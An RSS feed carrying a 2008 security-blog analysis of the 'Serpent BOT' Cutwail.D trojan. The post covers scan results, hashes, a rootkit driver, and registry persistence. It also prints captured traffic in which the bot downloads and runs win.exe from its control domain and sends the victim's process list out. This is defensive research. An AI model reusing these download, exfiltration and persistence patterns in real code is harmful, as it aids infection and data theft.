<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; Cutwail.D</title>
	<atom:link href="http://blog.novirusthanks.org/tag/cutwaild/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Serpent BOT (Web Based Malware)</title>
		<link>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/</link>
		<comments>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/#comments</comments>
		<pubDate>Sun, 23 Nov 2008 01:00:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Cutwail.D]]></category>
		<category><![CDATA[load.exe]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[rootkit]]></category>
		<category><![CDATA[Spam.Bot]]></category>
		<category><![CDATA[WinCtrl32.dll]]></category>
		<category><![CDATA[Winkk44.sys]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=312</guid>
		<description><![CDATA[Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface: &#160; &#160; The file that established connections with the website was named load.exe and below there is the report of the scan: Report Generated 22.11.2008 at 23.15.36 (GMT 1) Filename: load.exe File size: 27 [...]]]></description>
			<content:encoded><![CDATA[<p>Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_mainpage2.gif" alt="Web Based Malware" title="Web Based Malware" width="530" height="430" /></p>
<p>&nbsp;</p>
<p>The file that established connections with the website was named load.exe and below there is the report of the scan:</p>
<blockquote><p>
Report Generated 	22.11.2008 at 23.15.36 (GMT 1)<br />
Filename: 	<b>load.exe</b><br />
File size: 	27 KB<br />
MD5 Hash: 	97A860C202A8016E08818F3AA90525B8<br />
SHA1 Hash: 	CADF466ABD29CD993DD81EC838282589D0077BAC<br />
CRC32: 	89416946<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Microsoft Visual C++ 6.0<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
Detection Rate:	<span style="color: red;">23</span> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Downloader.Agent!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Dldr.Agent.agl</span><br />
Avast 	<span style="color: red;">Win32:Small-JMK [Trj] (0)</span><br />
AVG 	<span style="color: red;">Trojan horse Downloader.Zlob.12.R</span><br />
BitDefender 	<span style="color: red;">Trojan.Crypt.AI</span><br />
ClamAV 	<span style="color: red;">Worm.Socks-11</span><br />
Comodo 	<span style="color: red;">TrojWare.Win32.PSW.Agent.NHG</span><br />
Dr.Web 	<span style="color: red;">Trojan.PWS.Pace</span><br />
Ewido 	<span style="color: red;">Downloader.Agent.llo</span><br />
F-PROT 6 	<span style="color: red;">W32/Socks.A.gen!Eldorado (generic, not disinfectable)</span><br />
G DATA 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Downloader.Agent</span><br />
Kaspersky 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo</span><br />
McAfee 	<span style="color: red;">BackDoor-DRW trojan</span><br />
MHR (Malware Hash Registry) 	<span style="color: red;">Virus Found &#8211; detect rate 75%</span><br />
NOD32 v3 	<span style="color: red;">Win32/PSW.Agent.NHG trojan</span><br />
Norman 	<span style="color: red;">Trojan W32/Agent.EXZF ()</span><br />
QuickHeal 	<span style="color: red;">TrojanDownloader.Agent.llo</span><br />
Solo Antivirus 	<span style="color: red;">Infection TrojanDropper.Win32.Small.Bgx</span><br />
Sophos 	<span style="color: red;">Troj/Dloadr-BMT</span><br />
TrendMicro 	<span style="color: red;">WORM_SOCKS.BL</span><br />
VBA32 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo</span><br />
VirusBuster 	<span style="color: red;">Trojan.DL.Agent.ETEH</span>
</p></blockquote>
<p>When I executed this load.exe file, a lot of traffic was established with this domain:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">kolonka17.cn</pre></td></tr></table></div>

<p>Internet traffic:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/?&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn</pre></td></tr></table></div>

<p>With the traffic below, another executable file named win.exe will be downloaded and executed in my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/manda.php?id=-695459345&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
&nbsp;
hxxp://kolonka17.cn/win.exe|5
&nbsp;
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf</pre></td></tr></table></div>

<p>Next we see new traffic to a new domain, where it sends a lot of encrypted data:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
&nbsp;
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...</pre></td></tr></table></div>

<p>And below there is some interesting traffic:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/manda.php?id=-789987028&amp;amp;l=5&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
&nbsp;
ok
&nbsp;
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
&nbsp;
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe</pre></td></tr></table></div>

<p>The malware now gets the command to kill a list of processes on my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/proc_kill HTTP/1.1</pre></td></tr></table></div>

<p>But the malware will not stop at just killing the processes! The malware will also <strong>delete</strong> some important executable files of the system, such as:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\explorer.exe</pre></td></tr></table></div>

<p>In the new traffic below we can see the malware received another command:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
&nbsp;
none.exe
taskmon.exe
qip.exe
&nbsp;
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
&nbsp;
tasklis2t.exe
inf3ium.exe
note4pad.exe</pre></td></tr></table></div>

<p>And is always related to process killing. After, we sent new traffic to the domain:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
&nbsp;
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html</pre></td></tr></table></div>

<p>We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes &#8220;not much loved&#8221; by the malware.</p>
<p>&nbsp;</p>
<p>Next we received some traffic in the SMTP (25) port:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
&nbsp;
220 mx.google.com ESMTP k5si310246nfh.0
&nbsp;
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
&nbsp;
220 mx.google.com ESMTP n10si1763302mue.37
&nbsp;
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
&nbsp;
220 Mail.Ru ESMTP
&nbsp;
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
&nbsp;
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008</pre></td></tr></table></div>

<p>And a new driver is loaded by the malware:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\system32\drivers\Winkk44.sys</pre></td></tr></table></div>

<p>Report of the scan:</p>
<blockquote><p>
Report Generated 	22.11.2008 at 23.32.46 (GMT 1)<br />
Filename: 	<b>Winkk44.sys</b><br />
File size: 	32 KB<br />
MD5 Hash: 	286C4C43EFED1D81C59AA7BC70B83BD8<br />
SHA1 Hash: 	4D09AC6BE2808360697E7ECA71BEBF7CADFDE985<br />
CRC32: 	2495620378<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
Detection Rate:	<span style="color: red;">7</span> on 24</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Dropper.Cutwail!IK</span><br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	<span style="color: red;">Virus found BackDoor.Ntrootkit</span><br />
BitDefender 	<span style="color: red;">Trojan.Dropper.Cutwail.D</span><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web -<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<span style="color: red;">Trojan-Downloader.Win32.Mutant.aim A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Dropper.Cutwail</span><br />
Kaspersky 	<span style="color: red;">Trojan-Downloader.Win32.Mutant.aim</span><br />
McAfee 	-<br />
MHR (Malware Hash Registry) 	-<br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	<span style="color: red;">Infection TrojanDownloader.Win32.Mutant.Aim</span><br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-
</p></blockquote>
<p>Again a <font color="red">Trojan.Dropper.Cutwail.D</font> !</p>
<p>&nbsp;</p>
<p>Below there are some interested strings extracted from Winkk44.sys:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys</pre></td></tr></table></div>

<p>As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_safemode_startup.gif" alt="Kernel driver loaded in safe mode" title="Kernel driver loaded in safe mode" width="530" /></p>
<p>&nbsp;</p>
<p>During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file <strong>Winkk44_sys</strong> is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.</p>
<p>&nbsp;</p>
<p>Running processes that are visible with taskmanager:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_processi.gif" alt="Running processes" title="Running processes" /></p>
<p>&nbsp;</p>
<p>Registry keys used by the malware to startup with Windows:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_startup.gif" alt="Registry keys" title="Registry keys" /></p>
<p>&nbsp;</p>
<p>Service info:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_service_info.gif" alt="Registry keys of the rootkit driver" title="Registry keys of the rootkit driver" /></p>
<p>&nbsp;</p>
<p>These are the malware traces we can see from an HijackThis log:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
&nbsp;
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe</pre></td></tr></table></div>

<p>Below there is a small summary of the files created by the malware:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

